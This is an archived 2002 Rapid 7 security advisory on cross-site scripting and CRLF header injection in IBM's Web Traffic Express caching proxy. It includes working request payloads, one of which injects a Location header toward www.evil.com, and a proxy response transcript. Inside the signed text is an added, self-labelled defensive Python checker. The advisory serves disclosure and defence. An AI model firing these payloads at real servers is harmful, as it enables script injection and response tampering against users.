R7-0008: IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

From: Rapid 7 Security Advisories (advisoryat_private)
Date: Wed Oct 23 2002 - 14:51:52 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    _______________________________________________________________________
                         Rapid 7, Inc. Security Advisory
    
            Visit http://www.rapid7.com/ to download NeXpose(tm), our
             advanced vulnerability scanner. Linux and Windows 2000
                           versions are available now!
    _______________________________________________________________________
    
    Rapid 7 Advisory R7-0008
    IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues
    
       Published:  October 23, 2002
       Revision:   1.0
       http://www.rapid7.com/advisories/R7-0008.txt
    
       o First XSS issue (standard XSS)
          IBM:        APAR# IY24527
    
          CVE:        CAN-2002-1167
          http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1167
    
          Bugtraq:    6000
          http://online.securityfocus.com/bid/6000
    
       o Second XSS issue (HTTP header injection)
          IBM:        APAR# IY35139
    
          CVE:        CAN-2002-1168
          http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1168
    
          Bugtraq:    6001
          http://online.securityfocus.com/bid/6001
    
    1. Affected system(s):
    
       KNOWN VULNERABLE:
        o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
          with IBM WebSphere Edge Server v2.0)
        o IBM Web Traffic Express Caching Proxy Server v3.6
    
    2. Summary
    
       IBM Web Traffic Express Caching Proxy server is vulnerable to
       cross-site scripting.  The Caching Proxy server allows script code
       to be injected into pages using standard cross-site scripting
       techniques.  A second, variant attack allows the HTTP response
       headers to be manipulated.
    
       IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
       v2.0.  IBM Web Traffic Express v3.6 and earlier were separately
       shipping products.
    
    3. Vendor status and information
    
       IBM Software
       http://www-3.ibm.com/software/webservers/edgeserver/index.html
    
          IBM was notified of this issue and has released efix build number
          4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue
          and other security issues (see Rapid 7 advisory R7-0007 for more
          information: http://www.rapid7.com/advisories/R7-0007.txt ).
          
          IBM is tracking the first (standard) XSS issue as APAR# IY24527.
          IBM is tracking the second (header injection) XSS issue as
          APAR# IY35139.
    
    4. Solution
    
       IBM customers should install Caching Proxy efix build 4.0.1.26 or
       higher.  Efix builds can be downloaded from IBM's secure FTP site.
       For more information on obtaining efix builds, contact IBM support
       with the APAR numbers listed above.
    
       The fixes have also been ported back to the Web Traffic Express v3.6
       code base.  Customers running v3.6 should contact IBM support for
       more information on how to upgrade to a newer build.
    
    5. Detailed analysis
    
       There are two XSS techniques that can be used against the caching
       proxy server.  Please note that the following text may be
       wrapped or otherwise mangled by mail clients or gateways.  You
       should refer to the original advisory if there is a question about
       the exact text.
    
       a) Standard XSS exploit against Web Traffic Express Caching Proxy
    
       Request the following path from the caching proxy server:
    
          /"><img%20src="javascript:alert(document.domain)">
    
       b) XSS exploit against Web Traffic Express Caching Proxy, adding a
          second "Location:" header by using %0a%0d
    
       telnet www.victim.com 80
       Trying 192.168.100.1...
       Connected to www.victim.com.
       Escape character is '^]'.
       GET /%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert(document.domain)"> HTTP/1.0
    
       HTTP/1.1 302 Found
       Server: IBM-PROXY-WTE-US/3.6
       Date: Fri, 18 Oct 2002 03:44:18 GMT
       Location: http://www.victim.com/;www.victim.com/
       Location: http:/www.evil.com/<img src="javascript:alert(document.domain)">
       Accept-Ranges: bytes
       Content-Type: text/html
       Content-Length: 443
       Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT
    
       ...
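    The two techniques above share one root cause: the proxy percent-decodes the
    request path and copies it, unescaped, into a response header and into an
    HTML body.  The following Python is an added example, not part of the Rapid 7
    advisory or of IBM's code.  It shows the defensive side of both issues: a
    classifier that flags a request path carrying CR/LF or markup after decoding
    (useful as a log or IDS check), the hardened way to build a Location header
    (refuse control characters) and an error page (HTML-escape the reflected
    path), and a response check that counts Location headers, since the 302 in
    the transcript above carries two.  The sample request paths and the sample
    response are taken from section 5 of this advisory and reconstructed inline;
    the base URL and the error-page wording are assumptions of the example.

```python
# Added example (not part of the Rapid 7 advisory or IBM's code): defensive
# checks for the two issues described in section 5. Sample inputs are the
# request paths and the proxy response quoted in the advisory.
import html
import re
from urllib.parse import unquote

# Any control character (CR and LF included) ends or corrupts a header line.
_CTRL = re.compile(r"[\x00-\x1f\x7f]")

# Request paths quoted in section 5 of the advisory, used here as input.
STANDARD_XSS_PATH = '/"><img%20src="javascript:alert(document.domain)">'
HEADER_INJECTION_PATH = (
    '/%0a%0dLocation:%20http://www.evil.com/'
    '"><img%20src="javascript:alert(document.domain)">'
)

# The proxy's reply from section 5b, reconstructed as one raw response.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: IBM-PROXY-WTE-US/3.6\r\n"
    "Date: Fri, 18 Oct 2002 03:44:18 GMT\r\n"
    "Location: http://www.victim.com/;www.victim.com/\r\n"
    'Location: http:/www.evil.com/<img src="javascript:alert(document.domain)">\r\n'
    "Accept-Ranges: bytes\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 443\r\n"
    "Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT\r\n"
    "\r\n"
)


def classify_path(raw_path: str) -> list:
    """Flag a request path before it is reflected into a header or a page.

    The path is percent-decoded first because the proxy decoded %0a%0d
    before copying the path into its Location header (section 5b).
    """
    decoded = unquote(raw_path)
    findings = []
    if "\r" in decoded or "\n" in decoded:
        findings.append("crlf_in_path")
    elif _CTRL.search(decoded):
        findings.append("control_char_in_path")
    if re.search(r"[<>\"']", decoded):
        findings.append("markup_in_path")
    return findings


def build_location(base: str, decoded_path: str) -> str:
    """Hardened form: build a Location value, refusing control characters.

    Rejecting (rather than silently stripping) keeps the decision visible
    to whoever reads the proxy's error log.  `base` is an assumed value.
    """
    if _CTRL.search(decoded_path):
        raise ValueError("control character in redirect target")
    return f"Location: {base}{decoded_path}"


def render_error_html(decoded_path: str) -> str:
    """Hardened form for the standard XSS case: HTML-escape the path,
    quotes included, before echoing it into an (assumed) error page."""
    return ("<html><body>Cannot resolve "
            + html.escape(decoded_path, quote=True)
            + "</body></html>")


def count_header(raw_response: str, name: str) -> int:
    """Count a header in a raw response.  A 302 carrying two Location
    headers, as in the advisory's transcript, is a direct indicator of
    header injection and is cheap to alert on at a proxy or IDS."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    prefix = name.lower() + ":"
    return sum(1 for line in head.splitlines()
               if line.lower().startswith(prefix))


if __name__ == "__main__":
    for path in (STANDARD_XSS_PATH, HEADER_INJECTION_PATH, "/index.html"):
        print(path, "->", classify_path(path) or "clean")
    print("Location headers in sample response:",
          count_header(SAMPLE_RESPONSE, "Location"))
    try:
        build_location("http://www.victim.com", unquote(HEADER_INJECTION_PATH))
    except ValueError as exc:
        print("rejected:", exc)
```

    Note that the check runs on the decoded path: matching on the literal
    strings %0a or %0d in the raw request line is not enough, because the
    same bytes can be encoded in other ways and the proxy decodes before it
    reflects.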
    
    6. Contact Information
    
       Rapid 7 Security Advisories
       Email:   advisoryat_private
       Web:     http://www.rapid7.com/
       Phone:   +1 (212) 558-8700
    
    7. Disclaimer and Copyright
    
       Rapid 7, Inc. is not responsible for the misuse of the information
       provided in our security advisories.  These advisories are a service
       to the professional security community.  There are NO WARRANTIES
       with regard to this information.  Any application or distribution of
       this information constitutes acceptance AS IS, at the user's own
       risk.  This information is subject to change without notice.
    
       This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
       hereby granted to redistribute this advisory, providing that no
       changes are made and that the copyright notices and disclaimers
       remain intact.
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.7 (OpenBSD)
    
    iD8DBQE9tuwTcL76DCfug6wRAjNRAJ4qMUKne/vS+7k41XXYKS0wZ4PBFwCfdl8J
    +BWWNXDgIxkFJT1tiKzaHW4=
    =icsO
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 15:30:16 PDT